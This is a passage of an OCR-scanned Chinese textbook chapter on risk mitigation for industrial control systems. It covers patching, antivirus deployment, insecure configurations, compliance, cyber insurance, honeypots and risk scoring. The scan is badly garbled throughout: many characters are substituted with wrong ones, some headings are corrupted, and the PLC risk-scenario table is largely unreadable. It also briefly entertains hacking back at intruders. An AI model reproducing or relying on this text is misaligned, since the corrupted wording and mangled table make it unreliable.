用 户 找 到 漏洞 的 修复 方式 之 前 ， 软 件 广 商 们 并 不 想 让 全 世界 (包括 用 户 和 攻击 者 ) 都 知道 某 个 安全 漏洞 的 存在 。 当 然 ， 相 比 自己 建立 研究 团队 率先 挖掘 漏洞 并 进 
行 修复 ， 等 待 公告 的 过 程 要 慢 很 多 ， 但 是 聘请 安全 研究 团队 的 价格 不 菲 。 要 想 在 优先 于 ICS-CERT 报 告 帮 布 乙 前 的 第 一 时 间 惑 知晓 安全 漏洞 ， 那 么 很 可 能 需要 与 相 
天 的 软件 矿 商 建立 恨 好 的 私人 联系 (如果 他 们 没有 习惯 负责 任 地 告知 客户 关于 软件 漏洞 问题 的 话 。 当 然 ， 天 于 如 何 负责 任 地 披露 安全 漏洞 也 是 最 近 在 安全 领域 中 
引起 广泛 热 议 的 话题 之 一 ) 。 


然后 怎么 办 呢 ? 婚 然 知 道 了 正在 使 用 的 软件 存在 安全 漏洞 ， 束 不 能 焦虑 地 打坐 着 等 待 无 法 避免 的 黑客 攻击 。 了 解 漏洞 的 本 质 可 以 向 用 户 提 供 线 索 ， 帮 助 用 户 
更 改 系 统 配置 从 而 抵御 攻击 。 有 了 时 厂商 会 提供 IDS 或 者 IPS 特 征 码 ， 利 用 这 些 特 征 码 从 萨 可 以 隔离 出 可 能 市 有 的 攻击 载 从 的 网 络 流量 。 如 果 懂 得 如 何 识 别 攻击 ， 束 
可 以 设置 防火 墙 从 而 将 攻击 拒 之 门 外 ， 使 其 远离 存在 漏洞 的 系统 (当然 了 ， 除 非 漏洞 就 在 边界 路 由 器 上 .……. 那 样 的 话 可 选 的 防护 手段 束 少 了 很 多 ) 。 


鉴于 有 源 代码 软件 的 安全 问题 应 该 由 研发 人 员 解 决 ， 那 么 从 厂商 手 里 采购 软件 的 安全 问题 则 应 该 由 网 络 和 系统 管理 员 来 解决 ， 因 为 他 们 可 以 对 围绕 漏洞 系统 
的 相关 系统 重新 进行 配置 以 实现 对 存在 漏洞 的 系统 的 保护 。 束 像 研发 人 员 一 样 ， 管 理 员 也 应 该 熟悉 各 种 不 同类 型 的 安全 漏洞 。 虽 然 不 需要 和 程序 员 了 解 的 一 样 
多 ,但 是 他 们 也 应 当 清 楚 地 了 解 不 同 漏洞 之 间 相 对 的 严重 程度 以 及 如 何 预 防 相 关 攻 击 。 


要 想 为 关键 设备 提供 防御 屏障 ， 需 要 相关 人 员 深 入 了 解 网 络 中 主机 所 使 用 的 操作 系统 和 网 络 硬 件 自身 的 相关 知识 ， 以 及 如 何 对 其 进行 配置 、 网 络 架构 等 问 
题 。 所 有 这 些 知识 储备 都 可 以 用 来 阻止 向 目标 友 起 的 攻击 。 在 工控 系统 领域 中 找到 这 样 的 人 才 很 困难 ， 因 为 在 传统 IT 领 域 和 工业 设备 领域 中 所 应 用 的 技术 和 具体 


要 求 存在 差别 。 传 统 |T 人 员 通 常会 忽视 工控 系统 环境 中 的 关键 需求 ， 也 就 是 实时 响应 以 及 99.999% 的 正常 运转 时 间 ( 即 “5 个 9”) 。 另 外 一 方面 ， 拥 有 工控 系统 
领域 丰富 经 验 但 缺少 IT 领 域 知识 的 人 往往 又 会 忽视 一 些 可 以 解决 工控 系统 中 老 问 题 的 新 技术 。 如 果 存 在 一 支 团 队 (或 者 至 少 是 一 个 人 ) 在 这 两 个 领域 都 具备 丰富 
的 经 验 ， 那 么 将 是 一 种 非常 理想 的 情况 。 多 了 解 一 些 安全 方面 的 知识 、 保 持 适度 的 警惕 、 尝 试用 “黑客 ”的 思维 模式 看 待 问题 ， 对 于 专业 人 才 的 成 长 是 个 不 错 的 
开始 。 另 外 ， 所 有 人 都 了 解 可 靠 的 软 硬 件 和 安全 的 软 硬 件 之 间 的 区 别 也 很 重要 。 因 为 ， 合 法 用 户 能 够 对 某 一 设备 进行 正 冲 操 作 并 不 意味 着 这 人 台 设 备 融会 阻止 恶意 
用 户 对 其 加 以 利用 。 (想起 Modbus 协 议 了 吗 ? 你 想 让 它 做 什么 它 就 做 什么 ， 但 是 由 于 缺少 安全 控制 措施 ， 因 此 黑客 想 让 它 做 什么 它 也 会 做 什么 。) 

就 像 之 前 谈 到 研发 团队 时 所 提 到 的 (当然 这 对 其 他 团队 也 适用 ) ， 最 好 在 第 一 次 开发 系统 时 就 把 事情 做 到 位 。 如 果 网 络 和 系统 工程 师 熟 悉 常 见 的 安全 攻击 ， 
那么 他 们 从 一 开始 构建 系统 时 束 可 以 提高 进入 内 层 网 络 的 难度 。 在 纵深 防御 模型 中 ， 网 络 和 系统 工程 师 将 是 为 系统 设置 第 一 道 防线 的 人 员 ， 所 以 一 定 要 对 他 们 好 
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(2) 系统 的 补丁 更 新 


无 论 是 在 工控 系统 还 是 在 公司 IT 环境 中 ， 大 部 分 攻击 都 不 会 利用 未 知 的 或 者 说 是 0-day 漏 洞 。 如 果 攻 击 向 量 是 漏洞 的 话 ， 那 么 通 弟 这 个 漏洞 指 的 是 已 知 漏洞 。 
给 系统 打 补 丁 意味 着 给 工控 系统 网 络 中 所 有 主机 与 网 络 设备 中 的 操作 系统 和 固件 打 补 本 。 此 外 ， 补 丁 修复 的 对 象 还 包括 网 络 中 使 用 的 所 有 软件 。 这 融 使 得 定期 给 
系统 打 补 丁 成 为 了 显著 降低 系统 入 侵 风 险 的 最 直接 方法 。 


简 而 言 之 ， 在 IT 领域 中 进行 补丁 修复 是 一 种 非常 有 效 但 又 常 被 忽略 的 方法 。 正 如 同 工 控 系 统 有 关 的 事情 一 样 ， 工 控 系 统 环境 非常 特殊 并 且 难 于 处 理 。 因 此 ， 
修复 补丁 应 该 在 广 商 的 建议 指导 下 进行 。 工 控 系 统 的 软件 版 本 可 能 不 会 与 安 半 了 最 新 安全 补丁 和 更 新 后 的 操作 系统 相 兼 容 。 与 弟 见 的 上 T 领 域 相 比 ， 这 对 于 工控 系 
统领 域 而 言 是 个 很 大 的 问题 。15 年 前 ，Windows 安 全 补丁 需要 定期 中 断 应 用 程序 和 操作 系统 的 运行 才能 打上 。 现 在 ， 昌 然 这 种 情况 在 公司 IT 网 络 中 几乎 不 会 再 出 
现 了 ， 但 是 在 控制 系统 网 络 中 仍旧 是 个 重要 的 问题 。 因 此 ， 应 该 在 部 署 补 本 之 前 ， 首 先 在 测试 和 研 友 环境 中 对 补丁 进行 测试 。 此 外 ， 补 丁 的 管理 工作 在 控制 系统 
领域 可 能 会 非常 繁重 ， 但 是 却 行 之 有 效 。 


(3) 反 病 毒 软件 的 部 署 


就 像 其 他 |T 防 护 机 制 一 样 ， 反 病毒 软件 (Autivirus, AV) 的 部 署 在 工控 系统 环境 中 也 需要 愤 之 又 愤 。 在 工控 系统 环境 中 的 主机 上 部 署 反 病毒 技术 可 以 是 全 方 
位 的 ， 履 盖 整 个 工控 系统 环境 ; 也 可 以 精确 到 某 一 点 ， 例 如 某 个 人 机 界面 ， 或 者 是 某 个 单一 的 工业 实时 历史 数据 库 等 。 反 病毒 软件 在 传统 IT 设备 和 工控 系统 的 IT 主 
机 中 仍然 发 挥 着 至 关 重 要 的 作用 。 


通过 对 一 系列 动态 行为 进行 分 析 并 制订 的 相关 静态 规则 ， 反 病毒 软件 能 够 阻止 或 尝试 阻止 系统 中 恶意 代码 的 运行 。 反 病毒 软件 在 确保 信息 系统 安全 的 过 程 中 
起 到 了 非常 天 键 的 作用 ， 而 在 控制 系统 网 络 中 也 同样 如 此 。 在 控制 系统 网 络 中 部 署 反 病毒 软件 能 够 阻止 众多 恶意 代码 的 运行 ， 而 如 果 放 任 其 运行 则 可 能 导致 系统 
遭 到 严重 破坏 。 但 是 ， 即 使 反 病 毒 软件 有 着 这 样 那 样 的 优点 ， 在 控制 系统 网 络 中 部 署 反 病毒 软件 也 可 能 会 审 来 章 想 不 到 的 问题 。 


反 病 毒 软件 的 考量 


翡 衰 的 是 ， 很 多 工控 系统 网 络 都 是 在 缺少 维护 文 持 的 情况 下 运行 的 。 许 多 工控 系统 环境 中 的 软件 多 少年 来 都 没 打 过 补丁 。 因 此 ， 从 未 经 修复 的 安全 漏洞 再 到 
从 未 更 新 的 反 病 毒 .dat 文 件 所 ， 工 控 系统 环境 依然 存在 着 很 多 安全 问题 。 


在 工控 系统 环境 中 对 恶意 软件 的 防御 机 制 进行 审查 时 ， 应 该 就 如 下 问题 进行 了 解 : 

` 环境 中 可 以 安装 反 病 毒 软件 吗 ? 需要 记 住 ， 反 病毒 软件 也 会 将 正常 文件 误 报 为 恶意 代码 ， 这 一 问题 已 经 在 工控 系统 软件 的 相关 实例 中 提 到 过 。 
" 反 病 毒 软件 的 特征 码 如 何 更 新 ?2 由 于 工控 系统 环境 中 的 主机 不 能 直接 连接 互联 网 ， 那 么 需要 对 反 病 毒 软件 进行 手动 更 新 吗 ? 

+ 反 病 毒 软件 的 整体 漏 报 率 〈 将 恶意 代码 识别 为 正常 文件 的 比例 ) 是 多 少 ? 

. 反 病 毒 软件 的 整体 误 报 率 ( 将 正常 文件 识别 为 恶意 代码 的 比例 ) 是 多 少 ? 

` 哪 家 厂商 拥有 对 工控 系统 项 目 或 软件 提供 支持 并 且 了 解 相关 项 目的 可 靠 业 绩 ? 


. 工控 系统 环境 内 的 所 有 工作 站 都 会 部 署 反 病毒 软件 吗 ? (例如 ， 工 控 系 统 DMZ 区 中 的 所 有 系统 都 需要 安装 反 病 毒 软 件 吗 ， 还 是 只 在 
及 以 上 版 本 操作 系统 的 人 机 界面 主机 上 安装 ? ) 
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. 检测 结果 如 何 报 告 ? 需要 将 所 有 标记 为 恶意 代码 的 检测 结果 报告 给 中 央 日 志 服务 器 或 服务 吗 ? 
. 反 病 毒 软件 的 默认 配置 是 怎样 的 ? (例如 ， 默 认 情 况 下 ， 反 病毒 软件 是 会 阻止 恶意 代码 运行 还 是 会 放任 其 继续 执行 ? ) 


虽然 这 个 列表 并 不 能 涵盖 到 部 署 反 病毒 软件 时 需要 考虑 的 所 有 问题 ， 但 是 通过 对 上 述 几 个 问题 的 解答 将 有 助 于 了 解 在 控制 环境 中 部 署 反 病毒 解决 方案 时 所 市 
来 的 风险 。 


(4) 不 安全 配置 的 修复 


有 时候 还 是 要 回归 到 一 些 最 基本 的 事情 上 来 。 这 时 候 束 该 “最 佳 实践 ”上 场 了 。 从 概念 上 说 ,修复 不 安全 的 配置 非常 类 似 于 打 补 丁 。 对 于 大 部 分 设备 而 言 ， 


存在 一 种 可 以 接受 的 安全 配置 方式 ， 包 括 修 改 默认 密码 、 天 闭 用 不 到 的 服务 以 及 根据 最 小 权限 原则 进行 配置 设置 等 。 这 样 做 的 确 可 以 大 幅 改善 安全 现状 从 而 缓解 
大 量 风险 。 在 2015 年 12 月 乌克兰 的 电网 攻击 事件 中 ， 攻 击 过 程 中 并 未 用 到 什么 知名 漏洞 ， 也 并 未 展开 Stuxnet 式 的 攻击 。 事 件 的 起 因 是 电力 公司 的 一 名 职员 打开 
了 一 封 邮件 ， 邮 件 中 包含 了 一 个 启 入 恶意 代码 的 Microsoft Office 文 档 ， 同 时 这 名 职员 又 恰好 在 文件 中 启用 了 宏 。 正 是 这 个 小 小 的 行为 导致 了 乌克兰 的 断 电 事 故 。 


实施 对 工控 系统 环境 (或 任何 环境 ) 的 入 侵 不 仅仅 关乎 软件 、 硬 件 和 协议 ， 还 是 思维 模式 、 观 点 和 看 待 问题 方式 上 的 较量 。 当 对 任意 环境 实施 入 侵 时 ， 对 设 
备 的 配置 方式 、 人 员 的 操作 方式 了 解 得 越 多 ， 攻 击 就 越 有 效 。 对 于 机 构 来 说 在 看 待 风险 以 及 决定 采取 哪些 行动 时 也 应 该 采取 这 样 的 思维 模式 。 还 要 记 住 ， 工 控 系 
统 世界 的 运行 同上 所 有 其 他 公司 中 | 环境 的 运行 是 完全 不 同 的 。 


[1] 在 BlackHat 2014 EL, #44 Karsten Nohl 与 Jakob Lell 展示 了 他 们 称 之 为 “BadUSB” 的 漏洞 利用 方法 ， 该 方法 可 以 对 任意 USB 设备 进行 编程 ， 并 在 用 户 不 知道 
的 情况 下 感染 计算 机 。 一 译 者 注 


[2] 通常 反 病 毒 软件 会 将 病毒 特征 码 存 放 在 以 .dat 为 后 级 的 文件 中 。 一 译 者 注 


10.5 ”工控 系统 风险 缓解 的 其 他 方面 考量 


除了 几 个 明显 的 直接 与 工控 系统 网 络 安全 有 关 的 影响 因素 和 解决 方案 以 外 ， 还 有 一 些 不 是 很 明显 因此 经 常 被 忽视 的 情况 和 概念 。 这 些 场 景 也 给 工控 系统 网 络 
安全 市 来 了 其 他 挑战 或 者 说 是 提供 了 另外 一 种 解决 方案 。 


10.5.1 系统 集成 问题 


有 时候 安全 问题 并 不 存在 于 系统 的 任何 一 个 地 方 ， 而 是 可 能 由 系统 中 各 个 组 成 部 分 协同 工作 的 方式 所 引起 的 。 幸 运 的 是 ， 有 系统 架构 师 来 负责 解决 应 该 如 何 
将 所 有 组 件 集 成 在 一 起 ， 而 且 架 构 师 们 很 有 可 能 还 会 在 一 起 互相 讨论 交流 经 验 。 对 于 小 型 系统 而 言 ， 了 解 到 组 件 之 间 各 种 交互 方式 的 所 有 类 型 并 不 困难 。 但 是 ， 
如 果 系 统 规模 扩展 到 上 典型 工控 系统 的 规模 ， 那 么 系统 之 间 的 交互 将 迅速 提高 到 任何 一 个 人 都 难以 跟 路 了解 的 程度 。 


每 一 个 组 件 都 会 按照 其 技术 指标 运行 ， 但 系统 有 时 候 还 是 会 进入 到 “诡异 ”的 状态 ， 而 这 种 状态 是 任何 一 个 设计 师 都 不 曾 设 想到 的 。 这 种 类 型 的 漏洞 更 多 的 
是 逻辑 实现 上 的 问题 ， 而 不 是 代码 本 身 引 起 的 。 往 好 的 方面 想 ， 这 类 问题 往往 是 某 套 系统 独一无二 的 设计 所 导致 的 。 脚 本 小 子 使 用 网 上 下 载 的 漏洞 利用 工具 可 不 
会 找到 这 些 问题 。 但 不 好 的 方面 是 ， 这 类 问题 很 难 查找 定位 并 且 也 很 难 修复 。 


假设 系统 中 的 每 个 组 件 都 严格 按照 技术 规范 文档 中 要 求 的 那样 运行 (不 乎 的 是 这 种 情况 比 预想 的 要 罕见 多 了 ) ， 那 么 也 需要 有 人 对 下 一 级 别 中 系统 组 件 之 间 
交互 的 完整 性 进行 验证 。 除 了 一 些 繁重 的 体力 劳动 和 非常 严格 的 测试 ， 这 种 类 型 的 漏洞 本 质 上 确实 没有 什么 解决 办 法 。 束 像 程序 员 开展 侧重 于 安全 的 代码 审计 一 
样 ， 系 统 染 构 团 队 也 应 该 仔细 阅读 整个 系统 的 技术 规范 文档 ， 查 找 可 能 存在 的 潜在 逻辑 漏洞 。 


整个 团队 应 该 具备 攻击 者 的 思维 方式 ， 并 且 抛 开 对 组 件 预期 行为 的 所 有 主观 猜测 。 团 队 应 该 阅读 文档 中 对 组 件 运 行 方式 的 摘 述 。 如 果 团 队 能 够 完成 验证 ， 那 
么 再 出 现 的 任何 安全 漏洞 都 极 有 可 能 是 个 体 组 件 造成 的 ， 而 且 可 以 由 实施 人 员 (程序 员 、 管 理 员 之 类 的 人 员 ) 来 修复 。 


10.5.2 合 规 性 与 安全 性 


第 9 章 对 工控 系统 领域 中 的 安全 标准 进行 了 概述 ， 这 些 安 全 标准 对 网 络 安全 控制 提供 了 高 层次 的 指导 。 标 准 对 保障 工控 系统 安全 的 帮助 非常 大 ， 但 是 合 规 并 不 
意味 着 机 构 就 是 安全 的 ， 合 规 性 并 不 等 于 安全 性 。 有 些 审计 人 员 可 能 认为 合 规 性 等 价 于 安全 性 ， 但 是 优秀 的 安全 人 员 知 道 事 实 通 常 并 非 如 此 。 有 个 术语 叫 复 选 框 
安全 (checkbox security) 。 其 意思 是 安全 相关 的 内 容 (软件 、 硬 件 或 策略 ) 已 经 完成 了 部 署 实施 ， 即 已 经 部 署 某 台 安全 设备 、 制 订 了 有 某 项 安全 策略 或 者 安装 了 
某 款 安全 软件 ， 也 惑 意味 着 满足 了 安全 要 求 。 机 构 也 可 能 误 以 为 这 样 束 安 全 了 ， 但 通常 事实 上 可 不 是 这 样 ， 即 使 机 构 “ 符 合 ” 了 相关 安全 标准 的 要 求 。 


机 构 可 能 由 于 受到 法 律 或 者 董事 会 的 制约 ， 必 须 遵 循 某 项 特定 的 安全 标准 。 例 如 ， 作 为 美国 电气 设备 公司 的 CIO， 要 求 必须 遵循 NERC CIP 标 准 。 而 另 一 方 
面 ， 负 责 运 营 非 洲 沿海 油气 设施 的 某 家 石油 与 天 然 气 公司 的 董事 会 则 可 能 不 受 任何 标准 的 制约 ， 但 他 们 或 许 会 自愿 依据 IEC62443 标 准 或 者 NIST SP800-82 指 南 中 
的 要 求 制订 自己 的 安全 措施 。 


标准 只 是 提供 了 一 个 “底线 ”。 这 些 标准 为 审计 人 员 、 外 国政 府 以 及 机 构 之 外 的 组 织 (如 保险 公司 等 ) 提供 了 可 供 参 考 的 安全 框架 。 借 助 安全 标准 能 够 向 机 
构 内 部 以 及 外 部 人 员 传 达 已 经 执行 了 某 些 基 本 的 安全 任务 和 操作 的 信息 。 但 是 ， 大 部 分 标准 都 只 是 对 机 构 所 需要 达到 的 最 低 限 度 的 安全 水 平 做 出 了 要 求 。 但 是 通 
常 来 看 ， 这 些 最 低 限 度 的 要 求 反而 成 为 了 机 构 要 努力 达到 的 最 高 要 求 。 对 于 工控 系统 安全 团队 来 说 ， 如 果 在 监管 标准 中 并 未 对 某 项 安全 措施 做 出 要 求 ， 那 么 即使 
该 项 安全 措施 能 够 弥补 一 个 严重 的 安全 缺陷 ， 也 很 难 获 得 资金 支持 来 部 署 该 安全 措施 。 


10.5.3 ”购买 保险 


风险 处 置 机 制 的 一 种 经 典 方式 是 与 其 他 实体 分 担 风 险 (这 种 方式 通常 也 称 之 为 风险 转移 ， 但 是 更 确切 地 说 ， 还 是 应 该 叫 风 险 分 担 更 为 恰当 ， 因 为 风险 不 可 能 
百分之百 地 转移 ) 。 现 实 世 界 中 ， 购 买 保险 通常 是 人 们 和 机 构 用 合理 的 花 销 来 分 担 或 转移 风险 的 一 种 方式 。 在 很 多 领域 ,购买 保 险 已 经 成 为 一 种 成 熟 的 商业 实 
践 。 例 如 ， 美 国 汽车 保险 市 场 基于 风险 级 别 的 不 同 提供 了 多 种 具有 价格 竞争 力 的 保险 产品 ， 其 中 风险 级 别 的 确定 来 源 于 大 量 的 车 辆 事故 数据 。 保 险 公司 持续 胡 利 


(用 来 负担 那些 关于 蜥 蝎 、 骆 驼 和 超级 碗 四 分 卫 的 搞笑 广告 ) ， 并 且 不 断 为 客户 设置 新 的 期 望 值 。 一 般 来 说 ， 这 在 汽车 保险 领域 不 算 什么 新 鲜 事 儿 。 


但 是 另 一 方面 ， 对 于 网 络 保险 而 言 ， 却 没有 精确 的 统计 数据 支持 如 此 庞大 的 市 场 ， 因 为 网 络 领域 的 “事故 ”不 太 常 见 而 且 也 很 少 记录 在 案 (尤其 是 很 少 公 开 
记录 ， 因 为 遭受 攻击 的 机 构 总 是 倾向 于 费 尽心 思 地 淡化 安全 事件 ) 。 有 一 些 通 用 的 保险 政策 涉及 了 网 络 攻击 ， 但 是 其 他 的 通用 保险 政策 则 将 网 络 投诉 和 网 络 攻击 
排除 在 外 ， 理 由 是 这 些 问 题 并 没有 造成 物理 损失 。 不 过 ， 保 险 公司 正 在 开始 逐步 提供 某 些 特定 的 网 络 安全 责任 保险 产品 。 但 是 ， 融 我们 的 经 验 来 看 ， 这 种 类 型 的 
保险 目前 还 难以 广泛 推广 ， 并 且 围 绕 这 一 保险 产品 的 市 场 还 尚未 完善 。 


10.5.4 Bie 


保护 系统 免 遭 攻击 的 方法 并 不 总 是 天 于 如 何 令 系统 更 加 安全 。 有 的 时 候 令 计算 机 或 者 设备 处 于 极其 不 安全 的 状态 也 有 助 于 保障 系统 安全 。 这 怎么 可 能 呢 ? 原 
因 融 在 于 可 以 故意 削弱 系统 的 安全 保护 并 将 其 用 作 诱 饵 。 用 计算 机 安全 领域 的 行 语 讲 ， 这 融 是 所 谓 的 蜜 缸 (honeypot) 。 


当 攻击 者 扫描 存在 漏洞 的 系统 时 ， 会 非常 容易 地 发 现 密 链 。 他 们 会 尝试 通过 各 种 方式 获取 系统 的 访问 权限 并 以 该 系统 为 跳板 向 其 他 系统 进行 渗透 。 自 始 至 
终 ， 窗 锥 都 会 对 攻击 者 的 所 有 操作 进行 记录 。 这 些 记录 不 仅 有 助 于 确定 入 侵 检 测 系统 的 特征 码 ， 同 样 还 有 助 于 对 网 络 攻击 事件 立案 取证 ， 这 是 每 一 名 管理 员 在 发 
现 黑客 时 都 梦想 发 生 的 一 幕 ，“ 嘿 ! 逮 到 你 了 ! 


很 显然 ， 应 该 对 网 络 进行 配置 ， 尽 可 能 地 防止 黑客 以 密 镀 为 跳板 进行 网 络 渗透 。 在 密 饶 布 署 的 早期 阶段 ， 密 镀 还 只 是 个 安全 防护 薄弱 、 只 能 够 记录 大 量 日 志 
言 息 的 单个 主机 ， 在 网 络 部 署 时 与 其 他 机 器 相隔 离 。 但 是 近期 ， 密 缸 人 在 物理 上 可 能 还 是 单个 主机 ， 但 通过 虚拟 软件 在 其 上 却 运 行 了 一 整套 虚假 网 络 (技术 上 说 ， 
这 叫 蜜 网 ，honeynet) ， 攻 击 者 可 能 会 认为 自己 借助 跳板 隐蔽 地 潜入 了 目标 网 络 ， 可 实际 上 他 们 不 过 是 在 溪 费 时 间 ， 而 且 还 展示 了 他 们 对 系统 的 攻击 方式 。 这 些 
信息 能 够 帮助 用 户 更 好 地 实施 对 系统 的 保护 。 Digital Bond 公 司 研制 了 一 套 工 控 系 统 密 缸 ， 这 套 系统 绝对 值得 看 一 看 (http://www.digitalbond.com/tools/ICS- 
honeynet/) 。 


事实 上 ， 有 很 多 机 构 和 上 自由 安全 研究 人 员 在 世界 各 地 都 部 署 了 密 缸 ， 用 作 学 习 新 兴 攻 击 方 法 和 工具 的 途径 。 利 用 收集 到 的 信息 ， 在 对 抗 中 他 们 可 以 及 早 着 手 
制订 对 抗 措施 对 真实 系统 可 能 遭受 的 潜在 不 良 影响 予以 限制 。 


RESE TF, BATARA "Ra" (hack back) 攻击 者 。 这 种 行为 在 法 律 上 存在 争议 ,但 是 可 以 通过 在 合适 的 位 置 来 用 适当 的 法 律 措 太 进 行 解释 来 规 
避 可 能 引起 的 纠纷 。 攻 击 者 可 不 会 去 阅读 这 些 免责 声明 ,例如 “一 旦 非法 访问 本 系统 ， 则 视 为 非法 访问 者 同意 其 所 使 用 硬盘 会 被 损坏 .…..”。 在 此 只 是 提出 一 段 免 
责 声明 以 供 参 考 ， 免 责 声明 到 底 如 何 撰写 还 需要 仔细 推 襄 ， 这 不 过 是 为 了 防止 攻击 者 们 自我 感 嘻 良好 ， 误 以 为 他 们 是 工控 系统 领域 里 伸张 正义 的 蝙蝠 侠 。 


10.6 ”风险 缓解 过 程 


到 现在 为 止 ， 我 们 已 经 涵盖 了 整个 风险 评估 过 程 中 几乎 所 有 方面 的 内 容 ， 并 且 对 一 些 天 键 的 缓解 措施 、 人 策略 和 概念 进行 了 讨论 。 现 在 我 们 将 对 如 何 把 这 些 部 
分 组 合 在 一 起 从 而 制订 出 适合 自己 的 风险 缓解 策略 进行 研究 。 最 后 ， 这 一 步骤 也 是 目前 为 止 所 有 内 容 将 引出 的 终极 目标 。 风 险 缓解 是 我 们 为 什么 要 经 历 风险 评估 
完整 过 程 的 原因 所 在 。 正 如 总 体 风 险 评 佑 过程 一 样 ， 理 解 其 中 所 涉及 的 每 一 个 步骤 ， 以 及 如 何 对 所 获得 的 信息 加 以 配合 使 用 ， 对 于 制订 整体 风险 缓解 策略 而 言 都 
非常 重要 。 


10.6.1 ”风险 评估 步骤 的 融合 


构建 风险 缓解 策略 的 过 程 开 始 于 第 2 章 中 对 风险 评估 过 程 的 介绍 。 风 险 评估 将 与 风险 场景 或 者 在 攻击 三 要 素 、 渗 透 测试 和 威胁 建 模 中 用 到 的 信息 组 合 在 一 起 。 
这 些 信息 随后 用 于 构建 风险 场景 以 便 后 续 分 析 。 有 许多 不 同 的 方式 能 够 进行 风险 评估 ， 但 以 下 步骤 简要 概述 了 任何 评估 过 程 中 都 不 可 或 缺 的 首要 关键 任务 : 


1. 识 别 出 需 要 保护 的 对 象 ; 
2. 根 据 业 务 需求 或 者 目标 (关键 性 ) 对 保护 对 象 进行 优先 级 排序 ; 


3. 识 别 潜在 风险 ; 


x 


4. 度 量 安全 事件 发 生 的 可 能 性 及 其 潜在 影响 ; 


5. 确 保 系 统 设计 和 安全 控制 基于 已 识别 的 风险 进行 优先 级 排序 。 


10.6.2 ”风险 场景 的 融合 


第 3 章 里 ， 我 们 对 威胁 建 模 以 及 威胁 如 何 转变 为 威胁 事件 的 过 程 进行 了 介绍 。 创 建 的 威胁 事件 随后 被 映射 到 相关 的 后 果 ， 并 且 同 业务 目标 进行 比较 ， 从 而 完成 
了 风险 场景 的 构建 。 基 于 现 有 威胁 资源 、 威 胁 向 量 、 目 标 对 象 以 及 所 识别 出 的 脆弱 性 的 组 合 ， 威 胁 事件 (也 称 之 为 “攻击 树 ” 和 “杀伤 链 ”) 表示 了 潜在 的 攻击 
方法 。 表 10-1 所 示 的 PLC 风 险 场景 在 第 3 章 也 出 现 过 ( 见 表 3-11) 。 我 们 在 这 里 再 次 列 出 该 表 是 因为 这 张 表 是 风险 场景 构建 过 程 的 一 个 非常 好 的 代表 性 示例 。 


表 10-1 应 用 风险 评分 标准 的 PLC 风 险 场景 评分 示例 


潜在 威胁 源 | 攻 击 | 威胁 向 量 目标 对 象 | BARH, 潜在 后 果 
攻击 目标 


控制 器 处 于 故障 


状态 
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Aili _. 基于 栈 的 upia Cp O016. len-Bradley 了 的 控 a O a 
内 部 人 员 或 缓存 区 溢出 工程 师 站 nas MicroLogix 制 权 限 过 程控 制 故 陪 
前 内 部 人 员 er | PED-ENG: 1100 修改 配置 以 改 wt Fe KHR wT 


HE Ae BL ROCHE BE 
意 破 坏 


脆弱 性 严重 程度 资产 关键 性 ”攻击 可 能 性 影响 风险 评分 
9.8 3.0 2.5 3.0 6.7 


一 旦 风险 场景 构建 完成 ， 每 个 场景 都 会 分 配 一 个 用 数字 表示 的 评级 或 评分 。 这 些 评分 能 够 帮助 确定 每 个 场景 出 现 的 可 能 性 。 虽 然 我 们 使 用 的 方法 不 是 对 场景 
评分 或 评级 的 唯一 方法 ， 但 本 文 所 采用 的 方法 已 经 足以 满足 我 们 的 目标 ， 因 为 它 把 资产 天 键 性 、 攻 击 可 能 性 以 及 影响 都 考虑 在 内 了 。 正 如 第 3 章 中 谈 到 的 ， 资 产 天 
键 性 和 总 体 影响 属性 建立 了 风险 评分 和 优先 级 同业 务 目 标 之 间 的 关联， 并 且 攻 击 可 能 性 属性 也 将 风险 评分 同 现 有 的 安全 架构 天 联 人 在 一 起 。 读 者 或 许 已 经 意识 到 
了 ， 处 置 工控 系统 领域 的 风险 不 只 是 一 堆 冷 冰冰 的 分 析 ， 同 样 也 是 一 门 亏 术 。 请 记 住 ， 有 许多 从 简单 到 复杂 的 公式 和 算法 可 以 用 来 帮助 进行 风险 计算 。 只 要 将 优 
先 级 同业 务 目标 、 现 有 安全 体系 始终 如 一 地 紧密 联系 在 一 起 ， 在 进行 优先 级 排序 时 融 不 会 出 错 。 


10.6.3 ”成 本 效益 分 析 的 开展 


风险 场景 构建 完成 进行 评分 之 后 ， 还 需要 另外 开展 一 项 财务 分 析 。 财 务 分 析 是 一 种 定量 分 析 ， 用 来 帮助 用 户 从 一 个 全 新 的 视角 来 审视 为 每 个 风险 场景 所 赋予 
的 优先 级 。 财 务 分 析 还 能 够 帮助 用 户 确 定 哪些 缓解 措施 的 成 本 效益 较 高 ， 并 基于 缓解 措施 的 成 本 帮助 用 户 选 择 可 以 “接受 ”哪些 风险 。 


风险 计算 时 的 影响 评级 主要 有 以 下 两 种 基本 方法 : 
定性 分 析 方法 

使 用 高 、 中 、 低 级 别 值 对 风险 进行 优先 级 排序 ; 

` 标识 出 能 够 立即 进行 整改 的 区 域 ， 

` 通常 用 于 快速 评估 潜在 风险 ,例如 提出 系统 变更 的 请 求 时 ; 
+ 不 对 风险 的 严重 程度 提供 具体 可 量化 的 度量 ，; 

` 不 建议 用 于 成 本 效益 分 析 。 

定量 分 析 方 法 

“ 适用 于 成 本 效益 分 析 ; 

- 能 够 提供 对 严重 程度 的 度量 ; 

“ 需要 结合 定性 分 析 对 结果 进行 解释 ; 

其 他 需要 考虑 的 因素 : 

一 一 威胁 源 在 一 段 时 间 内 进行 漏洞 利用 的 频率 估计 ; 

一 一 每 次 暴露 的 近似 成 本 ; 

一 一 基于 对 风险 暴露 的 相对 影响 进行 主观 分 析 的 权重 因子 。 


ISC2CISSP 的 课程 介绍 了 最 常见 的 定量 分 析 方 法 。 例 如 ， 如 果 确 定 了 风险 缓解 措施 将 花费 15 万 美元 ， 那 么 就 可 以 考虑 接受 影响 在 15 万 美元 以 下 的 风险 。 实 施 
安全 控制 措施 的 成 本 同 潜在 风险 暴露 的 成 本 相 比 更 为 有 形 。 但 是 ， 或 许 对 于 有 些 风 险 来 说 ， 无 论 其 缓解 的 成 本 如 何 都 是 不 可 接受 的 。 计 算 风 险 的 步骤 如 下 所 示 : 


1. 预 估 潜 在 损失 。 确 定单 一 损失 期 望 值 (Single Loss Expectancy, SLE) 。SLE 的 计算 公式 如 下 : 


资产 值 (Asset value) X 暴露 因子 (EF) 三 单一 损失 期 望 (SLE) 
暴露 因子 是 主观 确定 的 ， 即 威胁 出 现时 某 一 资产 的 潜在 损失 比例 。 


